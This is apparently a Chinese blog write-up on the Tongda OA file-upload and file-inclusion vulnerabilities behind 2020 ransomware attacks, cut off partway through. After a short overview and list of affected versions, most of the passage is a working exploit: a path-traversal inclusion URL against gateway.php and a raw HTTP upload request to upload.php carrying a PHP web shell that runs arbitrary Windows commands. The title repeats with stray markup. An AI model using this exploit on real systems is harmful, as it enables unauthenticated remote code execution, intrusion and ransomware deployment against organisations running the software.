通达 oa php 文件 乱,通达（tongda）OA文件上传和文件包含漏洞重现及分析

通达 oa php 文件 乱,通达（tongda）OA文件上传和文件包含漏洞重现及分析"/>

通达 oa php 文件 乱,通达（tongda）OA文件上传和文件包含漏洞重现及分析

0x00 概述

20200317，网上爆出通达oa被利用0day中勒索病毒的消息，官方已出漏洞补丁。

该0day为利用文件上传和文件包含组合利用进行RCE，无须认证。

0x01 影响范围

2013，2013增强版，2015，2016，2017，v11

//补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁

0x02 漏洞重现

利用v11版本：

文件包含漏洞

http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log

文件上传漏洞

上传文件路径在非webroot目录，如：

“D:\MYOA\attach\im\2003\ddd.test.jpg”

请求数据包：

POST /ispirit/im/upload.php HTTP/1.1

Host: 127.0.0.1

Connection: close

Accept-Encoding: gzip, deflate

Accept: */*

User-Agent: python-requests/2.20.0

Content-Length: 633

Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="P"

x

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="UPLOAD_MODE"

1

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="DEST_UID"

1

--ee65cd98fdbee896acd30a7b2552b6b5

Content-Disposition: form-data; name="ATTACHMENT"; filename="test07.jpg"

Content-Type: image/jpeg

$command=$_POST['cmd'];

$wsh = new COM('WScript.shell');

$exec = $wsh->exec("cmd /c ".$command);

$stdout = $exec->StdOut();

$stroutput = $stdout->ReadAll();

echo $stroutput;

?>

--ee65cd98fdbe